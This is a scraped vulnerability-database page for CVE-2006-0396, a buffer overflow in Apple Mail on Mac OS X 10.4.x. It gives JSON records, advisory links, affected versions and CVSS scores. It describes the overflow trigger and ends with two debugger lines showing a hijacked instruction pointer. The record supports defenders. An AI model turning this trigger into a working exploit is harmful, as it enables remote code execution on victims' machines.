      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.9,
        "url": "http://docs.info.apple.com/article.html?artnum=303453"
      },
      {
        "trust": 2.7,
        "url": "http://www.kb.cert.org/vuls/id/980084"
      },
      {
        "trust": 1.8,
        "url": "http://lists.apple.com/archives/security-announce/2006/mar/msg00001.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/17081"
      },
      {
        "trust": 1.8,
        "url": "http://www.digitalmunition.com/dma%5b2006-0313a%5d.txt"
      },
      {
        "trust": 1.8,
        "url": "http://www.osvdb.org/23872"
      },
      {
        "trust": 1.8,
        "url": "http://securitytracker.com/id?1015762"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/19129"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
      },
      {
        "trust": 1.2,
        "url": "http://www.vupen.com/english/advisories/2006/0949"
      },
      {
        "trust": 1.2,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
      },
      {
        "trust": 0.9,
        "url": "http://www.digitalmunition.com/dma[2006-0313a].txt"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0396"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/19129/"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-0396"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2006/0949"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/427601/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/25209"
      },
      {
        "trust": 0.4,
        "url": "http://www.apple.com/macosx/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/427601"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/vulnerabilities/apple-osx-mail-cve-2006-0396"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/1583/"
      },
      {
        "trust": 0.1,
        "url": "http://www.apple.com/support/downloads/"
      },
      {
        "trust": 0.1,
        "url": "http://rfc.net/rfc1740.html"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#980084"
      },
      {
        "db": "VULHUB",
        "id": "VHN-16504"
      },
      {
        "db": "VULMON",
        "id": "CVE-2006-0396"
      },
      {
        "db": "BID",
        "id": "17081"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-003846"
      },
      {
        "db": "PACKETSTORM",
        "id": "44647"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-0396"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#980084"
      },
      {
        "db": "VULHUB",
        "id": "VHN-16504"
      },
      {
        "db": "VULMON",
        "id": "CVE-2006-0396"
      },
      {
        "db": "BID",
        "id": "17081"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-003846"
      },
      {
        "db": "PACKETSTORM",
        "id": "44647"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-0396"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2006-03-17T00:00:00",
        "db": "CERT/CC",
        "id": "VU#980084"
      },
      {
        "date": "2006-03-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-16504"
      },
      {
        "date": "2006-03-14T00:00:00",
        "db": "VULMON",
        "id": "CVE-2006-0396"
      },
      {
        "date": "2006-03-13T00:00:00",
        "db": "BID",
        "id": "17081"
      },
      {
        "date": "2014-03-11T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2006-003846"
      },
      {
        "date": "2006-03-14T22:24:53",
        "db": "PACKETSTORM",
        "id": "44647"
      },
      {
        "date": "2006-03-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      },
      {
        "date": "2006-03-14T11:02:00",
        "db": "NVD",
        "id": "CVE-2006-0396"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2006-03-29T00:00:00",
        "db": "CERT/CC",
        "id": "VU#980084"
      },
      {
        "date": "2018-10-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-16504"
      },
      {
        "date": "2018-10-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2006-0396"
      },
      {
        "date": "2006-03-15T12:15:00",
        "db": "BID",
        "id": "17081"
      },
      {
        "date": "2014-03-11T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2006-003846"
      },
      {
        "date": "2006-03-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      },
      {
        "date": "2024-11-21T00:06:21.873000",
        "db": "NVD",
        "id": "CVE-2006-0396"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Apple Mac OS X Mail Message Attachment Remote Buffer Overflow Vulnerability",
    "sources": [
      {
        "db": "BID",
        "id": "17081"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      }
    ],
    "trust": 0.9
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer overflow",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      }
    ],
    "trust": 0.6
  }
}

fkie_cve-2006-0396

Vulnerability from fkie_nvd

Published

2006-03-14 11:02

Modified

2025-04-03 01:03

Severity ?

Summary

References

URL	Tags
cve@mitre.org	http://docs.info.apple.com/article.html?artnum=303453
cve@mitre.org	http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html
cve@mitre.org	http://secunia.com/advisories/19129	Patch, Vendor Advisory
cve@mitre.org	http://securitytracker.com/id?1015762	Patch
cve@mitre.org	http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt	Exploit, Vendor Advisory
cve@mitre.org	http://www.kb.cert.org/vuls/id/980084	US Government Resource
cve@mitre.org	http://www.osvdb.org/23872
cve@mitre.org	http://www.securityfocus.com/archive/1/427601/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/17081	Exploit, Patch
cve@mitre.org	http://www.vupen.com/english/advisories/2006/0949
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/25209
af854a3a-2127-422b-91ae-364da2661108	http://docs.info.apple.com/article.html?artnum=303453
af854a3a-2127-422b-91ae-364da2661108	http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/19129	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1015762	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.kb.cert.org/vuls/id/980084	US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://www.osvdb.org/23872
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/427601/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/17081	Exploit, Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2006/0949
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/25209

Impacted products

Vendor	Product	Version
apple	mac_os_x	10.4
apple	mac_os_x	10.4.1
apple	mac_os_x	10.4.2
apple	mac_os_x	10.4.3
apple	mac_os_x	10.4.4
apple	mac_os_x	10.4.5
apple	mac_os_x_server	10.4
apple	mac_os_x_server	10.4.1
apple	mac_os_x_server	10.4.2
apple	mac_os_x_server	10.4.3
apple	mac_os_x_server	10.4.4
apple	mac_os_x_server	10.4.5

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "0760FDDB-38D3-4263-9B4D-1AF5E613A4F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFD4DE58-46C7-4E69-BF36-C5FD768B8248",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CF824694-52DE-44E3-ACAD-60B2A84CD3CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "B73A0891-A37A-4E0D-AA73-B18BFD6B1447",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "26AC38AB-D689-4B2B-9DAE-F03F4DFD15BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "0C580935-0091-4163-B747-750FB7686973",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x_server:10.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "D24D5FA5-95DD-4ECC-B99A-8CB33156A6D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x_server:10.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "29644501-54BD-45E9-A6C1-618892CD354F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x_server:10.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8A132487-E89F-4D0D-8366-14AFC904811F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x_server:10.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "FD231103-D7C7-4697-BE90-D67558D6115C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x_server:10.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "BCADAAA0-C885-466C-A122-A94E73EAF817",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x_server:10.4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "448DB1C7-7B0C-4076-9B9F-1CDCD5EB6930",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment."
    }
  ],
  "id": "CVE-2006-0396",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "HIGH",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.1,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 4.9,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2006-03-14T11:02:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://docs.info.apple.com/article.html?artnum=303453"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19129"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1015762"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/980084"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/23872"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/17081"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/0949"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://docs.info.apple.com/article.html?artnum=303453"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.apple.com/archives/security-announce/2006/Mar/msg00001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19129"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1015762"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://www.digitalmunition.com/DMA%5B2006-0313a%5D.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/980084"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/23872"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/17081"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/0949"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2006-0396 (GCVE-0-2006-0396)

Vulnerability from cvelistv5

CERTA-2006-AVI-108

Vulnerability from certfr_avis

Description

Solution

ghsa-rrmc-qhwh-87xf

Vulnerability from github

gsd-2006-0396

Vulnerability from gsd

var-200603-0281

Vulnerability from variot

0 0x41424344 in ?? ()

1 0x41424344 in ?? ()

fkie_cve-2006-0396

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature